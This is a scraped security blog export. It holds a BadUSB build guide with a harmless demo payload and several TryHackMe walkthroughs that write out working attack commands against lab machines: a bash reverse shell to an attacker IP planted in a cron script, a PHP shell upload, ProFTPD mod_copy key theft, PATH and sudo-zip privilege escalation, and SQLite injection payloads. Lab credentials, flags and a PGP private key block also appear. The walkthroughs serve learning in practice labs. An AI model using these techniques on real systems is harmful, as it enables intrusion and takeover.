Social engineering: to make the target feel safe enough to plug it in.\nBut once inserted, the USB device didn’t behave like storage — it acted as a keyboard, leveraging the BadUSB exploit technique.\nThe same model in the above pictureIt instantly began typing out malicious PowerShell commands that:\nDownloaded and installed malware,Opened backdoor access for the attackers,In some cases, triggered ransomware deployments.The devices were configured to bypass endpoint protection by avoiding file-based malware altogether. Because the attack originated from a device posing as a trusted Human Interface Device (HID), most antivirus systems didn’t flag it at all.\nThe outcome?\nSeveral organizations experienced system compromises, malware infections, and ransomware deployment — all from a USB drive that no one thought twice about.\nThis wasn’t a phishing link.It wasn’t a zero-day exploit.It was a keyboard hidden inside a USB stick — a $5 piece of hardware designed to look harmless, but capable of devastating impact.\nThis is the essence of BadUSB — an attack that targets human trust and hardware assumptions.\nAnd after reading about this, I wanted to go deeper. 
I wanted to see just how easy it is to craft and use one.\nINTRODUCTION:BadUSB attacks highlight a serious vulnerability in the way computers trust USB devices.\nThese attacks rely not on malware files, but on malicious firmware that can turn an ordinary-looking USB device into a stealthy attack tool.\nCurious to explore this threat firsthand, I began researching BadUSB options — but most were either too expensive or overly complex for a beginner.\nAfter some digging, I discovered a budget-friendly alternative: the Raspberry Pi Pico.\nRaspberry Pi PicoPaired with the open-source Pico-Ducky project, I was able to build a fully functional BadUSB device that emulates a keyboard and executes scripted payloads.\nThis article walks through how I created it, what it can do, and why such a low-cost tool underscores the growing accessibility of hardware-based attacks.\nWHAT IS A BAD USB ?Common TrendsBadUSB is a class of attack that exploits the trust your computer places in USB devices.\nRather than carrying malware in storage, a BadUSB attack modifies the firmware inside the device itself — changing its identity to something far more dangerous.\nThe most common payload? A USB that emulates a keyboard and starts typing commands the moment it’s plugged in.\nNo clicking, no prompts, no warnings — just immediate execution.\nBecause:\nOperating systems trust keyboards by default,Most endpoint protection tools don’t monitor HID behavior,And the attack requires no user interaction at allWhy Is BadUSB So Dangerous?Invisible Execution: No files = no scanning = no alertsCross-Platform: Works on Windows, macOS, Linux — even locked systemsOS Trust: Keyboards are inherently trusted by your deviceCheap to Build: Anyone can do it with $5–$10 in hardwareInstant Payload: Execution begins milliseconds after insertionAnd the biggest risk? 
Human behavior. Curiosity, convenience, and unawareness make it devastatingly effective.\nMy Hands-On BadUSB BuildTo understand the threat more deeply, I built a functioning BadUSB device using a Raspberry Pi Pico microcontroller and the open-source Pico-Ducky project.\nThis device emulates a keyboard, reads Ducky Script payloads, and can be customized based on the needs.\nWhat I UsedRaspberry Pi Pico ($4–$6)Micro-USB cableWindows laptop (for demo)CircuitPython 9.2.1Pico-Ducky GitHub codeAdafruit CircuitPython Libraries (v9.x)Step-by-Step Guide:To start off, just plug the Pico into your system through the cable, and this is what you should see.Step 1: Download Firmware and LibrariesVisit Pico-Ducky on GitHub → Download ZIPScroll down and find installation instructionsClick the CircuitPython link: Raspberry Pi Pico UF2 FirmwareDownload the .UF2 firmware fileAlso download: Adafruit CircuitPython Bundle 20250509Step 2: Prepare FilesCreate a folderPlace the UF2 firmware and both ZIP files inside itExtract both ZIPsStep 3: Flash the PicoHold the BOOTSEL button (little white button) while plugging in the PicoIt mounts as RPI-RP2Drag and drop the .UF2 file onto itIt reboots as CIRCUITPYStep 4: Load Code and LibrariesOpen the extracted Adafruit zip → /lib/\nCopy these libraries to Pico’s /lib/:\nadafruit_hidadafruit_wsgiasyncioadafruit_debouncer.mpyadafruit_ticks.mpyAND\nFrom pico-ducky, copy the following files to Pico root:\nboot.pycode.pyduckyInPython.pywebapp.pywsgiserver.pyStep 5: Write a PayloadHere is a basic payload that I tried, which shows the system information:\nOpen NotepadEnter this Ducky Script:DELAY 500WINDOWS rDELAY 500STRING cmdENTERDELAY 1000CTRL-SHIFT ENTERDELAY 2000STRING systeminfoDELAY 1000ENTERDecoding the Ducky Script:\nDELAY 500// Wait for 0.5 seconds after the device is plugged in to ensure the system is ready.WINDOWS r// Opens the Windows Run dialog by pressing Windows + R.DELAY 500// Short pause to allow the Run dialog to appear.STRING cmd// Types 
“cmd” into the Run dialog to launch the Command Prompt.ENTER// Presses Enter to execute the command.DELAY 1000// Waits 1 second for the Command Prompt to open.CTRL-SHIFT ENTER// Presses Ctrl + Shift + Enter to launch the Command Prompt with administrator privileges (UAC elevation).DELAY 2000// Waits 2 seconds to allow the UAC prompt to appear and be accepted (assumes the user presses ‘Yes’).STRING systeminfo// Types “systeminfo”, a Windows command that displays detailed system information.DELAY 1000// Short pause to ensure the command is registered properly.ENTER// Executes the “systeminfo” command.Save as payload.dd → File type: All FilesStep 6: Test ItUnplug the PicoPlug it back inWatch CMD open and auto-type your payload in real-timeAnd, these are the files that should be presentVerify if these files are presentReal-World BadUSB AttacksStuxnet (2007–2010)The infamous U.S.–Israeli cyberweapon used to damage Iran’s nuclear centrifuges was delivered via USB to an air-gapped network. It exploited human behavior, bypassed physical isolation, and caused physical destruction — all from a flash drive.\nFIN7 Mail Campaign (2022)The FIN7 gang sent infected USBs in fake Amazon/Best Buy packages. Once inserted, the drive launched ransomware and remote access malware using HID emulation.\nMelbourne USB Drop (2016)Unmarked USB sticks were dropped into people’s mailboxes in suburban Australia. 
When plugged in, they auto-installed malware under the guise of a media player.\nHow to Protect Against BadUSB AttacksTechnical DefensesDisable unused USB ports via BIOS or Group PolicyUse endpoint protection tools with USB device controlWhitelist known USB devices onlyMonitor USB events using a SIEM solutionRestrict HID devices on locked systemsUser AwarenessNever plug in an unknown or unsolicited USB driveAvoid accepting “promotional USBs” from events or mailTrain employees using simulated USB drop testsUse USB data blockers when charging in public placesConclusionBadUSB isn’t just a concept — it’s a silent, low-cost attack method disguised as everyday hardware.\nWith a $5 board and some open-source code, I built a functioning device in under 30 minutes.\nWhat I made was simple and purely for learning, but far more sophisticated versions are out there.So the next time you pick up a USB stick, pause and ask yourself:\nIs it really just storage… or something far more dangerous?\nREFERENCEShttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/https://www.bankinfosecurity.com/fin7-targets-us-enterprises-via-badusb-a-18278https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomwarehttps://darknetdiaries.com/episode/35/ ","date":"25 May 2025","externalUrl":null,"permalink":"/articles/technisch/trusting-the-wrong-device-a-hands-on-cybersecurity-breakdown/","section":"Security Research \u0026 Articles","summary":"","title":"Trusting the Wrong Device — A Hands-On Cybersecurity Breakdown","type":"articles"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Startup” STARTUP-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Startup”\nThis room is classified as easy and is a walkthrough-type challenge. 
I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nI’m just kiddinWe start with the usual scan to identify open ports:\nnmap 10.10.81.33 --openResult:\nFTP (21)SSH (22)HTTP (80)FTP EnumerationLet’s test for anonymous access:\nftp 10.10.81.33Username: anonymousPassword: anonymousSuccess!\nInside, we look around:\nftp\u0026gt; lsimportant.jpgnotice.txtGrab them both:\nftp\u0026gt; get important.jpgftp\u0026gt; get notice.txtThe text file turns out to be a meme, but we spot a name: “Maya”.\nAs there was nothing too interesting on the base web page, we run feroxbuster:\nferoxbuster -u http://10.10.81.33 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtWe discover /files/, but nothing juicy.\nSo now, I try utilizing a reverse shell.\nStep 1: Prepare the payload:\nnano reverse-shell.phpPaste a PHP reverse shell from Pentestmonkey, replacing the IP with your tun0/local IP and port.\nStep 2: Upload it via FTP:\nftp 10.10.81.33cd ftpmput reverse-shell.phpStep 3: Trigger the shell:\nStart your listener:\nnc -lvnp 1234Open the URL:\nhttp://10.10.81.33/files/reverse-shell.php\nBOOM! Shell obtained as www-data\nNow that we are in, we are going to enumerate locally:\nStep 1: Read available files\nlscat recipe.txtWe find: LOVE\nStep 2: Investigate deeper\nTry accessing /home/lennie, but permission is denied.\nExplore more directories and discover:\n/var/ftp/incidents/suspicious.pcapng\nTransfer it over or open it with tcpdump or Wireshark. 
You’ll spot this password used with sudo:\nc4ntg3t3n0ughsp1c3Now let’s escalate privilege:\nWe start off by trying to switch user:\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'su lenniePassword: c4ntg3t3n0ughsp1c3Success! Now we have access as lennie.\nWe get the user.txt:\ncat user.txtTHM{03ce3d619b80ccbfb3b7fc81e46c0e79}Now to escalate to root.\nCheck directories owned by root but accessible to lennie:\ncd /opt/scripts/ls -laWe find a script: planner.sh\nYou can’t edit it, but it sources another script:\ncat /etc/print.shHere’s the trick — print.sh can be edited.\nWe again formulate a reverse shell:\nStep 1: Create your reverse shell\necho 'bash -c \"bash -i \u0026gt;\u0026amp; /dev/tcp/YOUR_IP/8080 0\u0026gt;\u0026amp;1\"' \u0026gt; /etc/print.shStep 2: Start your listener\nnc -lvnp 8080When the root cron runs the planner.sh script, it includes print.sh -\u0026gt; a root shell drops into your netcat listener.\nOnce in, we finish with\ncd /rootcat root.txtTHM{f963aaa6a430f210222158ae15c3d76d}The 3 flags are:\nloveTHM{03ce3d619b80ccbfb3b7fc81e46c0e79}THM{f963aaa6a430f210222158ae15c3d76d}CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"20 May 2025","externalUrl":null,"permalink":"/writeups/tryhackme/startup-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"STARTUP-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! 
This is a beginner-friendly room from the TryHackMe platform titled “kenobi” KENOBI-TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “kenobi”\nThis room is classified as easy, but it was a bit tricky for me to complete; I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nWe start by loading the machine IP in the browser:\nhttp://10.10.41.38\nIt loads an image — clearly a Star Wars reference, fitting for the box name Kenobi.\nNow we kick off enumeration with Nmap:\nnmap 10.10.41.38 --open -AThis reveals multiple services:\nFTP (port 21)SSH (port 22)SMB (ports 139, 445)NFS (port 111)The THM task mentions Samba, so we start with targeted enumeration on port 445:\nnmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.41.38We see three shares listed — including an anonymous share.\nLet’s try accessing it:\nsmbclient //10.10.41.38/anonymousWhen prompted for a password: just hit Enter (anonymous access)Inside the share:\nlsget log.txtexitReading log.txt reveals:\nServer nameA reference to anonymous login on FTPAnd a path where a key was savedBased on Nmap results, port 111 is open — indicating NFS is available. Let’s enumerate:\nnmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.41.38We discover that /var is mountable.\nLet’s mount it:\nsudo mkdir /mnt/kenobiNFSsudo mount 10.10.41.38:/var /mnt/kenobiNFSSuccess! 
We now have access to the /var directory from the remote machine.\nBack to our Nmap results — we saw this version:\nProFTPD 1.3.5\nLet’s search for an exploit:\nsearchsploit ProFTPD 1.3.5We find mod_copy is vulnerable — it allows remote file copy using SITE commands.\nSo we open a raw FTP session to try this:\nnc 10.10.41.38 21then:\nSITE CPFR /home/kenobi/.ssh/id_rsaSITE CPTO /var/tmp/id_rsaThis copies Kenobi’s private SSH key to the /var/tmp directory.\nNow, since we already mounted /var, we can access it locally:\nls -la /mnt/kenobiNFS/tmpcp /mnt/kenobiNFS/tmp/id_rsa .chmod 600 id_rsaLet’s SSH in:\nssh -i id_rsa kenobi@10.10.41.38Now we are in and can grab user.txt:\ncat user.txtd0b0f3f53b6caa532a83915e19224899Privilege EscalationLet’s search for SUID binaries:\nfind / -perm -u=s -type f 2\u0026gt;/dev/nullAmong common ones, an odd binary shows up:\n/usr/bin/menu\nRun it:\n/usr/bin/menu\nIt shows a basic menu with 3 options. Let’s inspect the binary with strings:\nstrings /usr/bin/menuWe see it runs: curl ifconfig.me\nBut it doesn’t use the full path to curl. Since the binary is SUID root, if we place our own curl script earlier in the PATH, menu runs our version as root and we gain root access.\nWe create our fake curl binary:\necho /bin/sh \u0026gt; curlchmod +x curlThen set our PATH to point to the current directory first:\nexport PATH=/home/kenobi:$PATHrun: /usr/bin/menu\nSelect option 1, which tries to run curl → but now it runs our version, giving us a root shell.\nGet the final flag:\ncd /rootcat root.txt177b3cd8562289f37382721c28381f02CONCLUSION:I hope this write-up walkthrough was helpful to you all! This room covered:\nSamba EnumerationPRO FTPDReverse ShellsPrivilege EscalationNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. 
I plan on continuing to put out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"18 May 2025","externalUrl":null,"permalink":"/writeups/tryhackme/kenobi-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"KENOBI-TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is an “easy” room from the TryHackMe platform titled “Ignite” TOMGHOST- TRY HACK ME-ROOMHello everyone! This is an “easy” room from the TryHackMe platform titled “Ignite”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nWe start by going to the target IP, but it isn’t accessible, so we run nmap:\nnmap 10.10.39.107 --openThis revealed four open ports, and port 8080 is there with http-proxy.\nNavigating to http://10.10.39.107:8080 in the browser landed me on an Apache Tomcat default page.\nVersion shown: 9.0.30Googling “tomcat 9.0.30 exploit”, I came across the Ghostcat vulnerability, which allows unauthenticated file reading on vulnerable Tomcat versions.\nSo I fired up Metasploit:\nmsfconsoleThen searched and used the Ghostcat module:\nsearch ghostcatuse auxiliary/admin/http/tomcat_ghostcatshow optionsset RHOSTS 10.10.39.107runAfter running it, we get:\nWelcome to GhostCatskyfuck:8730281lkjlkjdqlksalksThe format clearly means these are credentials, so I try them over SSH:\nssh skyfuck@10.10.39.107Password: 8730281lkjlkjdqlksalks\nNow we are in!\nThen I start exploring the contents:\nls -lacd /homecd skyfuckNothing here, so I backtrack and try:\ncd /home/merlinls -lacat user.txtTHM{GhostCat_1s_so_cr4sy}Next:\nsudo -lbut nothing useful.\nThen I notice these two files, with .pgp and .asc extensions:\ncredential.pgptryhackme.ascThe .asc is the PGP public key, and .pgp is an encrypted credential.\nLet’s try to decrypt:\ncat tryhackme.ascgpg --import tryhackme.ascgpg --decrypt credential.pgpBut it asks for a passphrase — so we have to crack it.\nTo crack the passphrase, I hosted the files on the target and downloaded them to my attacker machine.\nOn the target (inside SSH):python3 -m http.server --bind 10.10.39.107On attacker machine (new terminal):wget http://10.10.39.107:8000/tryhackme.ascwget http://10.10.39.107:8000/credential.pgpConvert the public key for John the Ripper:\ngpg2john tryhackme.asc \u0026gt; hashNow to crack it:\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashWe get the passphrase: alexandru(If it doesn’t display: john --show hash)\nNow decrypt:\ngpg --decrypt credential.pgpPassphrase: alexandru\nThat shows us 
this:\nmerlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123jTime to switch users:\nsu merlin# enter password =\u0026gt;\n( asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j)\nNow it’s time to perform privilege escalation:\nsudo -lWe see:\n(root : root) NOPASSWD: /usr/bin/zip\nzip under sudo is a well-known escalation path. Using GTFOBins:\nTF=$(mktemp -u)sudo zip $TF /etc/hosts -T -TT 'sh #'And we are in!\ncd /rootcat root.txtThat leads us to the root.txt:\nTHM{Z1P_1S_FAKE}ConclusionI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through this room, I hope it helps you and gets you through the room as well. I will be putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup\n","date":"13 May 2025","externalUrl":null,"permalink":"/writeups/tryhackme/tomghost-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"TOMGHOST- TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Light” LIGHT- TRY HACK ME-ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Light”\nThis room is classified as easy and is a walkthrough-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! 
:)\nHere it’s already mentioned we need to connect via netcat (nc), so let’s go ahead with it:\nnc 10.10.166.182 1337Once connected, we’re greeted with a username/password login prompt.\nThe prompt asks for:\nUsernamePasswordTrying the obvious, I entered smokey, and got a password field.\nThen, I tested basic SQL injection. Here’s what happened:\n' → returns:\nError: unrecognized token: “‘’’ LIMIT 30”\nsmokey' → returns:\nError: unrecognized token: “‘smokey ‘’ LIMIT 30”\nI tried UNION-based payloads too, but they were of no use here either:\nTried ' or '1'='1' → still an error, and I feel it’s due to how quotes are handled.\nThen I try dropping the trailing single quote and injecting like this:\nsmokey' or '1'='1and a random string password is returned: tF8tj2o94WE4LKC\n(at least no error lol)\nAt this point, I knew I was working with SQL, but not the usual MySQL.\nThe room name is light, so I suspected SQLite.\nTo confirm, I Googled: “light db sql injection”\nThis led me to a goldmine: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md\nThen I immediately tested this:\nsmokey' UNION SELECT sqlite_version()--It returned: 3.31.1\nSo now I know I’m working with SQLite 3.31.1\nNext up: find where the juicy stuff is (like users, passwords, etc.)\nFor this I extract the database structure:\nsmokey' UNION SELECT sql FROM sqlite_master'And there we see the table name: admintable\nsmokey' UNION SELECT username FROM admintable--It worked:\nTryHackMeAdminLet’s now pull the password:\nsmokey' UNION SELECT password FROM admintable--We get the flag:\nTHM{SQLit3_InJ3cTion_is_SimplE_nO?}Now to get the password:\nsmokey' UNION SELECT password FROM admintable WHERE id='1(WHERE id='1 filters the results so you only get the password of the row where the id is 1)\nand we get the password:\nmamZtAuMlrsEy5bp6q17CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through the room, I hope it helps 
you and gets you through the room as well. I will be putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"11 May 2025","externalUrl":null,"permalink":"/writeups/tryhackme/light-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"LIGHT- TRY HACK ME-ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Anthem.” ANTHEM— THM CTF — WRITEUPHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Anthem.”\nThis room is classified as easy and is a walkthrough-type challenge. It took me a bit to complete and was a fun room, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nFirst, we deploy the machine. While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network. 
We encounter a web page with some image and text.\nI initiate an Nmap scan and run a Feroxbuster scan.\nnmap -A -p- 10.10.55.249Open ports found:80 (HTTP)3389 (RDP)Looking through the webpage, it contains subpages like blogs, categories and tags related to articles.\ngobuster dir -u http://10.10.55.249/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtIn the blog section, in one of the blog posts, we even see an email address!\nNext I check robots.txt, as the webpage contains the word “Crawlers”, which hints at it:\nhttp://10.10.55.249/robots.txtIt reveals the CMS in use → Umbraco.\nThe homepage text mentions anthem.com.\nDomain name = anthem.comNext, on inspecting the source code:\nSearching for Admin Panel, we find a poem with the word “admin” in it.\nHint: Poem might be a clue!So I copy \u0026amp; paste the poem into a search engine → It refers to Solomon Grundy.\nThis gives the username clue; we also remember seeing the email on the blog page:\njd@anthem.comFollowing the same pattern:\nSolomon Grundy → SGAdmin Email → sg@anthem.comAnd this works!\nNow, referring to the gobuster scan, we see some locations:\nFlag 1: Under /authors\nFlag 2: Inspect the homepage\nFlags 3 \u0026amp; 4: Found in two blog pages\nThat covers those flags.\nNext, utilizing the CMS system:\nGo to:\nhttp://10.10.55.249/umbraco/#/loginUse credentials found earlier:\nUsername: sg@anthem.comPassword: UmbracoIsTheBest!Nothing useful inside Umbraco CMS.\nRemember: Nmap showed no domain is configured.Try RDP (Port 3389).Remote Desktop (RDP) AccessConnect using rdesktop\nI had an issue with the screenshots, but below are the steps I performed:\nOpen File Explorer.Go to This PC → Local Disk C.Click View → Enable Hidden Files.Open Backup Folder.Click Restore.A popup appears.Right-click → Properties → Security → Edit.Add User: SGWe get the admin password!Log back into the system using new admin credentials:Username: 
AdministratorPassword: ChangeMeBaby1MoreTimeAccess the Root File \u0026amp; Capture the Final FlagConclusionI hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. This being my first writeup, I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"6 May 2025","externalUrl":null,"permalink":"/writeups/tryhackme/anthem-thm-ctf-writeup/","section":"Security Labs \u0026 Writeups","summary":"","title":"ANTHEM— THM CTF — WRITEUP","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Year Of The Rabbit.” Anonforce — TryHackMe — CTF WriteupHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Anon force.”\nThis room is classified as easy and is a walkthrough-type challenge. It took me around 20 minutes to complete, and I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nThe real ANONFirst, we deploy the machine. 
While it’s booting up, go ahead and open your terminal tab and get it ready.\nOnce it’s up, let’s copy the IP address and connect to the network.\nWe encounter a webpage, which immediately prompts me to initiate an Nmap scan and run a Feroxbuster scan\nnmap 10.10.60.146 — openResults show FTP is open.\nExploiting FTP:Connect to FTP using anonymous login:\nftp anonymous@10.10.60.146List directories:\nls -laThen I immediately Navigate to the user directory:\ncd /homecd melodiasget user.txtexitNow back in terminal :\ncat user.txt\nFlag: 606083fd33beb1284fc51f411a706af8Finding Encrypted Files:Check the /notread Directory\nIn FTP and navigate to /notread\ncd /notreadls -laget backup.pgpget private.ascexitNow checking the files:\ncat backup.pgpstrings backup.pgpcat private.ascWhen I cat private.asc :\n— — -BEGIN PGP PRIVATE KEY BLOCK — — -\nVersion: BCPG v1.56\nlQOBBF1Q5b0RCACMPpWfiiRRNpQxK0kAhv2w69+5fSmbS4+4QxgoDsEBIITWNkAF\nGTVoPBz3My0NzF4IN5GTspwgZtwFOeQixsuM41CiGQzqRMPHIuxwJeqjWfSaaVRP\n6IXFMalaOnOg9CNmhljZIUdu2yLRClWBrmCFptFmhL6ONeP4tOCX9Vbok2TvFSdT\ncbeXyOFraia9bAKtf9Ioky7Jyjao6Hf9XZ8o2k+lKVyaAkj/Vmxoo6DISHZZbMuJ\nHcwr86Dw7+agpqpX4hLvGoZASMrX/qpmWZrePtHw1wHuN9/vhu0QfFQRmTrxRrgz\n73iazo3s6QDtDEWnakJf0FWw3YAqmZWbzXvdAQDCsrET6ESqWRweYj45mQimgGYq\nsnIw5fskEE4M1xQ5ywf/SXgpGC50Ffo27EEdtppnCZKjKicv53+6LXl8pV1zVs4r\n3PCY0oI0xyYQzTvcfClGzBmCuUx6KdNXswlrqprTWT4K/NT54UbJ4QUjtr9unA2v\nSJl/+T+e8IAdq+cifpONsbJ/PprDW+SYeBO4sKZJ4FQ34N7E6NsdgONQehQNn5tm\nx1Zq6bqfsJ+GdE0RLjugRbNEtnRCf6pm573kWNqrZa38EuQtVxV8NmOyomFA0q5Z\nFDZilngg9k5WcQLfvwWtbNdrPLe8p0iafEl70fYVuXDYo3LBFx6wG/H8fIJYs0JA\nJPX8xVpFNgEti1nzJIB3iqVAootZhs3fM9BoOZ9IpAf+L3ILQU1xUljB1qB6lA9a\n4RM3rjWeCqfulAHGrzJ9sKhNP35IQ084x+Pyx9KFbKgzDjeA3v3Rl27Iec887hMW\nz8ZmvEu5+UBUys8SRB4rrtaF7KB3EM0fZCCettwukUasj0BsdAU9TcSEXFS++jkC\nFg2p8RGyDvVVIZMmI4kpyJwsKinZiNEWHbcpOWWkJ0H7AOjuXiqUE+DU7YueYVpi\ncnqPsdzAnzbh18U5AapzSev4S/qQXDeGve5l4twUfseZKB5JqHThtpct2rH+hTXL\nYRawy2DG+C8y/7sBX+kfybeKL5nY4e8Z1hoD+gGmSPwDS0APAzu/Y5DfIokvxLwF\nuv4JAwLX0R
2b9tCJaGBdBE2CV47MYrqqFcG88c/d5BmscV7VUZcSL9Csxkd4MiZt\nuDtjo/DRa39fs9srk6aplQE7seev9pfngtUFiR7iYOlXE2V3tCJhbm9uZm9yY2Ug\nPG1lbG9kaWFzQGFub25mb3JjZS5uc2E+iF4EExEIAAYFAl1Q5b0ACgkQuSzR8oCt\ngsLtYAD+MnWnZUPILmIdWvDHmq8bk49tOjVfqru0e//luaBI2joA/juindQ78DzX\nbQ6FQg8KKIqOcNo6cukKUQ6LlAfRVozlnQE/BF1Q5b0QAgCUlP7AlfO4XuKGVCs4\nNvyBpd0KA0m0wjndOHRNSIz44x24vLfTO0GrueWjPMqRRLHO8zLJS/BXO/BHo6yp\njN87Af0VPV1hcq20MEW2iujh3hBwthNwBWhtKdPXOndJGZaB7lshLJuWv9z6WyDN\nXj/SBEiV1gnPm0ELeg8Syhy5pCjMAgCIVMI7XCQPUoTUUjx0OkGZgCIfwi3VhE3x\namMj9/jRdkMiru6VkQ99eHe7vBMU4o2fvkEc9OEJ7arSStx1kGaw/gkDAtfRHZv2\n0IloYDNaPIv2qF/OvtZmtcw3Xyx6BsOtiEtlrr65+ksBIkDbA6R81qPV/FqaW4Ln\ne2+g6wesYTM3pwaeQ+VGFDhkx4AuI0ncbba66jJY0/ywR6jRX91x2bemfspmkHhk\nRD8+0br41bsLUYheBBgRCAAGBQJdUOW9AAoJELks0fKArYLCNqUBAJEvBOqOUm8z\ne0LI7MiExxECea560p1r7WmEbKuKBeOPAPoDWDbsWSZpUq7Qj9CWla/vkGUs3ELd\nayAA8xm2L+QD7ZkDLgRdUOW9EQgAjD6Vn4okUTaUMStJAIb9sOvfuX0pm0uPuEMY\nKA7BASCE1jZABRk1aDwc9zMtDcxeCDeRk7KcIGbcBTnkIsbLjONQohkM6kTDxyLs\ncCXqo1n0mmlUT+iFxTGpWjpzoPQjZoZY2SFHbtsi0QpVga5ghabRZoS+jjXj+LTg\nl/VW6JNk7xUnU3G3l8jha2omvWwCrX/SKJMuyco2qOh3/V2fKNpPpSlcmgJI/1Zs\naKOgyEh2WWzLiR3MK/Og8O/moKaqV+IS7xqGQEjK1/6qZlma3j7R8NcB7jff74bt\nEHxUEZk68Ua4M+94ms6N7OkA7QxFp2pCX9BVsN2AKpmVm8173QEAwrKxE+hEqlkc\nHmI+OZkIpoBmKrJyMOX7JBBODNcUOcsH/0l4KRgudBX6NuxBHbaaZwmSoyonL+d/\nui15fKVdc1bOK9zwmNKCNMcmEM073HwpRswZgrlMeinTV7MJa6qa01k+CvzU+eFG\nyeEFI7a/bpwNr0iZf/k/nvCAHavnIn6TjbGyfz6aw1vkmHgTuLCmSeBUN+DexOjb\nHYDjUHoUDZ+bZsdWaum6n7CfhnRNES47oEWzRLZ0Qn+qZue95Fjaq2Wt/BLkLVcV\nfDZjsqJhQNKuWRQ2YpZ4IPZOVnEC378FrWzXazy3vKdImnxJe9H2Fblw2KNywRce\nsBvx/HyCWLNCQCT1/MVaRTYBLYtZ8ySAd4qlQKKLWYbN3zPQaDmfSKQH/i9yC0FN\ncVJYwdagepQPWuETN641ngqn7pQBxq8yfbCoTT9+SENPOMfj8sfShWyoMw43gN79\n0ZduyHnPPO4TFs/GZrxLuflAVMrPEkQeK67WheygdxDNH2QgnrbcLpFGrI9AbHQF\nPU3EhFxUvvo5AhYNqfERsg71VSGTJiOJKcicLCop2YjRFh23KTllpCdB+wDo7l4q\nlBPg1O2LnmFaYnJ6j7HcwJ824dfFOQGqc0nr